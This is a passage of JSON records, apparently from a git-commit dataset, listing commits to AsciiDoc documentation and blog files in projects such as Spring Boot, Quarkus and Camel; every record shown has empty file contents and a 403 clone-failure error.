yaperumalg\/spring-boot,shangyi0102\/spring-boot,eddumelendez\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,brettwooldridge\/spring-boot,javyzheng\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,jmnarloch\/spring-boot,joshiste\/spring-boot,pvorb\/spring-boot,ollie314\/spring-boot,aahlenst\/spring-boot,lburgazzoli\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,donhuvy\/spring-boot,ameraljovic\/spring-boot,vakninr\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,chrylis\/spring-boot,SaravananParthasarathy\/SPSDemo,eddumelendez\/spring-boot,hello2009chen\/spring-boot,lenicliu\/spring-boot,shangyi0102\/spring-boot,tsachev\/spring-boot,royclarkson\/spring-boot,scottfrederick\/spring-boot,Buzzardo\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,rweisleder\/spring-boot,mbogoevici\/spring-boot,dreis2211\/spring-boot,zhanhb\/spring-boot,lucassaldanha\/spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,vakninr\/spring-boot,xiaoleiPENG\/my-project,shangyi0102\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,tsachev\/spring-boot,ihoneymon\/spring-boot,jmnarloch\/spring-boot,philwebb\/spring-boot-concourse,bjornlindstrom\/spring-boot,mosoft521\/spring-boot,habuma\/spring-boot,rweisleder\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,donhuvy\/spring-boot,philwebb\/spring-boot-concourse,ptahchiev\/spring-boot,shakuzen\/spring-boot,isopov\/spring-boot,hello2009chen\/spring-boot,sebastiankirsch\/spring-boot,rweisleder\/spring-boot,ameraljovic\/spring-boot,mrumpf\/spring-boot,cleverjava\/jenkins2-course-spring-boot,minmay\/spring-boot,zhangshuangquan\/spring-root,Buzzardo\/spring-boot,jbovet\/spring-boot,lenicliu\/spring-boot,olivergierke\/spring-boot,tsachev\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,ihoneymon\/spring-boot,ollie314\/spring-boot,shangyi0102\/spring-boot,lucassaldanha\/spring-boot,Nowheresly\/spring-boot,jxblum\/spring-boot,jmnarloch\/spring-boot,lucassaldanha\/spring-boot,spring-projects\/spring-boot,mbogoevici\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,i007422\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,hqrt\/jenkins2-course-spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,neo4j-contrib\/spring-boot,donhuvy\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,dfa1\/spring-boot,xiaoleiPENG\/my-project,hello2009chen\/spring-boot,sebastiankirsch\/spring-boot,Buzzardo\/spring-boot,vpavic\/spring-boot,hqrt\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,RichardCSantana\/spring-boot,jmnarloch\/spring-boot,javyzheng\/spring-boot,scottfrederick\/spring-boot,SaravananParthasarathy\/SPSDemo,SaravananParthasarathy\/SPSDemo,philwebb\/spring-boot,sbuettner\/spring-boot,tiarebalbi\/spring-boot,ptahchiev\/spring-boot,afroje-reshma\/spring-boot-sample,ptahchiev\/spring-boot,qerub\/spring-boot,royclarkson\/spring-boot,joshthornhill\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,cleverjava\/jenkins2-course-spring-boot,pvorb\/spring-boot,kdvolder\/spring-boot,bjornlindstrom\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,isopov\/spring-boot,yhj630520\/spring-boot,sbcoba\/spring-boot,mrumpf\/spring-boot,neo4j-contrib\/spring-boot,jxblum\/spring-boot,bijukunjummen\/spring-boot,joansmith\/spring-boot,afroje-reshma\/spring-boot-sample,rajendra-chola\/jenkins2-course-spring-boot,akmaharshi\/jenkins,nebhale\/spring-boot,mdeinum\/spring-boot,philwebb\/spring-boot-concourse,philwebb\/spring-boot,bclozel\/spring-boot,rweisleder\/spring-boot,bjornlindstrom\/spring-boot,brettwooldridge\/spring-boot,joansmith\/spring-boot,htynkn\/spring-boot,spring-projects\/spring-boot,drumonii\/spring-boot,nebhale\/spring-boot,mbenson\/spring-boot,bclozel\/spring-boot,cleverjava\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,mosoft521\/spring-boot,chrylis\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,bijukunjummen\/spring-boot,deki\/spring-boot,drumonii\/spring-boot,ihoneymon\/spring-boot,donhuvy\/spring-boot,lenicliu\/spring-boot,lenicliu\/spring-boot,philwebb\/spring-boot,mosoft521\/spring-boot,bbrouwer\/spring-boot,candrews\/spring-boot,zhangshuangquan\/spring-root,vakninr\/spring-boot,royclarkson\/spring-boot,izeye\/spring-boot,srikalyan\/spring-boot,mbogoevici\/spring-boot,kdvolder\/spring-boot,thomasdarimont\/spring-boot,jayarampradhan\/spring-boot,thomasdarimont\/spring-boot,RichardCSantana\/spring-boot,sebastiankirsch\/spring-boot,jvz\/spring-boot,joshiste\/spring-boot,eddumelendez\/spring-boot,shakuzen\/spring-boot,jayarampradhan\/spring-boot,lexandro\/spring-boot,Buzzardo\/spring-boot,hello2009chen\/spring-boot,eddumelendez\/spring-boot,kamilszymanski\/spring-boot,htynkn\/spring-boot,mrumpf\/spring-boot,neo4j-contrib\/spring-boot,vpavic\/spring-boot,tsachev\/spring-boot,mbogoevici\/spring-boot,sbcoba\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,royclarkson\/spring-boot,i007422\/jenkins2-course-spring-boot,vakninr\/spring-boot,tiarebalbi\/spring-boot,ameraljovic\/spring-boot,ptahchiev\/spring-boot,mdeinum\/spring-boot,herau\/spring-boot,brettwooldridge\/spring-boot,felipeg48\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,thomasdarimont\/spring-boot,tsachev\/spring-boot,bclozel\/spring-boot,pvorb\/spring-boot,chrylis\/spring-boot,joansmith\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,herau\/spring-boot,herau\/spring-boot,linead\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,sbuettner\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,srikalyan\/spring-boot,zhangshuangquan\/spring-root,srikalyan\/spring-boot,linead\/spring-boot,rweisleder\/spring-boot,drumonii\/spring-boot,wilkinsona\/spring-boot,linead\/spring-boot,olivergierke\/spring-boot,wilkinsona\/spring-boot,izeye\/spring-boot,philwebb\/spring-boot,nebhale\/spring-boot,royclarkson\/spring-boot,DeezCashews\/spring-boot,ollie314\/spring-boot,jayarampradhan\/spring-boot,candrews\/spring-boot,jxblum\/spring-boot,minmay\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,scottfrederick\/spring-boot,qerub\/spring-boot,jbovet\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,joansmith\/spring-boot,ameraljovic\/spring-boot,jvz\/spring-boot,isopov\/spring-boot,mbenson\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,chrylis\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,kdvolder\/spring-boot,htynkn\/spring-boot,bclozel\/spring-boot,olivergierke\/spring-boot,i007422\/jenkins2-course-spring-boot,shakuzen\/spring-boot,Nowheresly\/spring-boot,tsachev\/spring-boot,kamilszymanski\/spring-boot,donhuvy\/spring-boot,shangyi0102\/spring-boot,dreis2211\/spring-boot,joansmith\/spring-boot,lucassaldanha\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fb2361609b96baee4b0b9e21f87df3c8227ddc8","subject":"Update 2016-10-24-Computer-Science-Midterm.adoc","message":"Update 2016-10-24-Computer-Science-Midterm.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-24-Computer-Science-Midterm.adoc","new_file":"_posts\/2016-10-24-Computer-Science-Midterm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b327f92bed4de9e8813dee2f35566f5630275b19","subject":"y2b create post I've Got The iPhone X Prototype!!!","message":"y2b create post I've Got The iPhone X Prototype!!!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-08-Ive-Got-The-iPhone-X-Prototype.adoc","new_file":"_posts\/2017-07-08-Ive-Got-The-iPhone-X-Prototype.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c924fc5e8914ef83f47bb9b556fd10f7390a108","subject":"aggiunta della sintassi","message":"aggiunta della sintassi\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"sintassi.adoc","new_file":"sintassi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"20781357380ee82a62128bd6e2136f5d1a62f942","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0468065b7ae2d0938fe04d553bdda7eed74af2af","subject":"Update 2017-12-29-So-what-about-English-title.adoc","message":"Update 2017-12-29-So-what-about-English-title.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-12-29-So-what-about-English-title.adoc","new_file":"_posts\/2017-12-29-So-what-about-English-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fb2e5b2b8defa82d562e13cb5287a108eb85fef","subject":"Adding 1.8 Final announcement","message":"Adding 1.8 Final announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-12-16-debezium-1.8-final-released.adoc","new_file":"_posts\/2021-12-16-debezium-1.8-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72336e58984f9197eb03860322a90c4bfa110d73","subject":"Write the async message passing guide","message":"Write the async message passing guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/async-message-passing.adoc","new_file":"docs\/src\/main\/asciidoc\/async-message-passing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1dffe6a7a1a3488f6221497638c0e5354cf3ba9","subject":"Update 2017-06-09-Gabe-loses-his-Compasses-for-a-bit.adoc","message":"Update 2017-06-09-Gabe-loses-his-Compasses-for-a-bit.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-09-Gabe-loses-his-Compasses-for-a-bit.adoc","new_file":"_posts\/2017-06-09-Gabe-loses-his-Compasses-for-a-bit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a0156289e602ba5e8237593b93cb19c561897fe","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a37c111b7c50bdc1c5c19658751f58b36fe0ef","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"866b0c145b6fd82e470f461d30db42eff795ecdd","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7df87857da049f97655d7e9335c6fe017434fa1d","subject":"Update code documentation","message":"Update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21dc7ada7cfe46a82863880238a76a22c0c90f2d","subject":"Update 2016-11-10-091800-Thursday-Morning.adoc","message":"Update 2016-11-10-091800-Thursday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08ecd6c229f12ce7c5f553736b8855475fcdfea4","subject":"y2b create post Epic iPhone 4S Unboxing","message":"y2b create post Epic iPhone 4S Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-14-Epic-iPhone-4S-Unboxing.adoc","new_file":"_posts\/2011-10-14-Epic-iPhone-4S-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f053b341a4fba4b401f82c99f55b3849d05769c","subject":"Started operator overloading notes","message":"Started operator overloading notes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week05.asciidoc","new_file":"asciidoc\/week05.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"882822852d11f4d5b3d21f7836a58766b829dbff","subject":"Use primitive types","message":"Use primitive types\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Null.adoc","new_file":"Best practices\/Null.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4bb97c202ed9811df96c078b1aa9561c1a6105f","subject":"Added instructions for downsampled data.","message":"Added instructions for downsampled data.\n","repos":"jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2bc7b1ccb82aff7fada3f324a4daf84a0b73e49","subject":"Update 2012-11-09-google-cloud-endpoints.adoc","message":"Update 2012-11-09-google-cloud-endpoints.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"474b90c1ed3a5830727eb5ba37678b281e591324","subject":"Camel-main-maven-plugin: Improve NOTE section","message":"Camel-main-maven-plugin: Improve NOTE section\n","repos":"apache\/camel,pax95\/camel,adessaigne\/camel,pmoerenhout\/camel,ullgren\/camel,ullgren\/camel,apache\/camel,christophd\/camel,pax95\/camel,nikhilvibhav\/camel,adessaigne\/camel,nikhilvibhav\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,nicolaferraro\/camel,pax95\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nicolaferraro\/camel,pmoerenhout\/camel,mcollovati\/camel,cunningt\/camel,cunningt\/camel,nicolaferraro\/camel,CodeSmell\/camel,cunningt\/camel,tdiesler\/camel,alvinkwekel\/camel,DariusX\/camel,DariusX\/camel,cunningt\/camel,pax95\/camel,apache\/camel,zregvart\/camel,gnodet\/camel,ullgren\/camel,tdiesler\/camel,zregvart\/camel,pax95\/camel,tadayosi\/camel,alvinkwekel\/camel,alvinkwekel\/camel,adessaigne\/camel,mcollovati\/camel,apache\/camel,gnodet\/camel,cunningt\/camel,mcollovati\/camel,adessaigne\/camel,nikhilvibhav\/camel,pax95\/camel,cunningt\/camel,gnodet\/camel,tadayosi\/camel,adessaigne\/camel,zregvart\/camel,mcollovati\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,pmoerenhout\/camel,CodeSmell\/camel,christophd\/camel,CodeSmell\/camel,tdiesler\/camel,gnodet\/camel,alvinkwekel\/camel,apache\/camel,tdiesler\/camel,zregvart\/camel,DariusX\/camel,nikhilvibhav\/camel,christophd\/camel,apache\/camel,nicolaferraro\/camel,pmoerenhout\/camel,DariusX\/camel,tadayosi\/camel,gnodet\/camel,CodeSmell\/camel,tadayosi\/camel,ullgren\/camel","old_file":"catalog\/camel-main-maven-plugin\/src\/main\/docs\/camel-main-maven-plugin.adoc","new_file":"catalog\/camel-main-maven-plugin\/src\/main\/docs\/camel-main-maven-plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"28f41408d81afd6d2ff7e37af1923816dcf1b57c","subject":"Update 2017-05-31-TWCTF-2017.adoc","message":"Update 2017-05-31-TWCTF-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8137e70c30d45f38e4dad392114a919494999a3","subject":"Small changes to documentation.","message":"Small changes to documentation.\n","repos":"pidydx\/artifacts,sebastianwelsh\/artifacts,keithtyler\/artifacts,crankyoldgit\/artifacts,destijl\/artifacts,vonnopsled\/artifacts,destijl\/artifacts,pidydx\/artifacts,vonnopsled\/artifacts,keithtyler\/artifacts,sebastianwelsh\/artifacts,crankyoldgit\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crankyoldgit\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec63cdd5782df40ec710b91a8918337b83b6c650","subject":"Update 2015-03-20-dictcc-direct-search.adoc","message":"Update 2015-03-20-dictcc-direct-search.adoc","repos":"woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io","old_file":"_posts\/2015-03-20-dictcc-direct-search.adoc","new_file":"_posts\/2015-03-20-dictcc-direct-search.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/woehrl01\/woehrl01.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49c591cb66bf8f225f5010360c91b5b864e30ffa","subject":"Update 2018-04-20-deploy-by-kubernetes.adoc","message":"Update 2018-04-20-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-20-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-20-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"688b032997c2eaa22fc3bc905a5fd515b879de6d","subject":"y2b create post You've Never Seen A Mouse Do This...","message":"y2b create post You've Never Seen A Mouse Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-13-Youve-Never-Seen-A-Mouse-Do-This.adoc","new_file":"_posts\/2017-12-13-Youve-Never-Seen-A-Mouse-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06d580551749101cd0cddee08828ec500ed03593","subject":"Delete 2018-02-05-.adoc","message":"Delete 2018-02-05-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-.adoc","new_file":"_posts\/2018-02-05-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"902dbc1988e6b450071eae1b0f12acb1cbe86d56","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eb3f1294a897d2985bd45291cbc24f92a25f1e2","subject":"common snippet: add functionalTests intro","message":"common snippet: add functionalTests intro\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-functionalTestsIntro.adoc","new_file":"src\/main\/docs\/common-functionalTestsIntro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bef6c7fee405e87eaab44229879d7e4f335b96d","subject":"Update regexp-syntax.asciidoc (#20973)","message":"Update regexp-syntax.asciidoc (#20973)\n\n","repos":"rlugojr\/elasticsearch,fernandozhu\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,JervyShi\/elasticsearch,fernandozhu\/elasticsearch,spiegela\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,jprante\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,nezirus\/elasticsearch,MaineC\/elasticsearch,nilabhsagar\/elasticsearch,yanjunh\/elasticsearch,Helen-Zhao\/elasticsearch,vroyer\/elassandra,Stacey-Gammon\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,fforbeck\/elasticsearch,wuranbo\/elasticsearch,bawse\/elasticsearch,alexshadow007\/elasticsearch,JervyShi\/elasticsearch,spiegela\/elasticsearch,C-Bish\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,artnowo\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,Shepard1212\/elasticsearch,robin13\/elasticsearch,nilabhsagar\/elasticsearch,mortonsykes\/elasticsearch,wuranbo\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,Helen-Zhao\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,kalimatas\/elasticsearch,robin13\/elasticsearch,henakamaMSFT\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,glefloch\/elasticsearch,fforbeck\/elasticsearch,bawse\/elasticsearch,JervyShi\/elasticsearch,rlugojr\/elasticsearch,yanju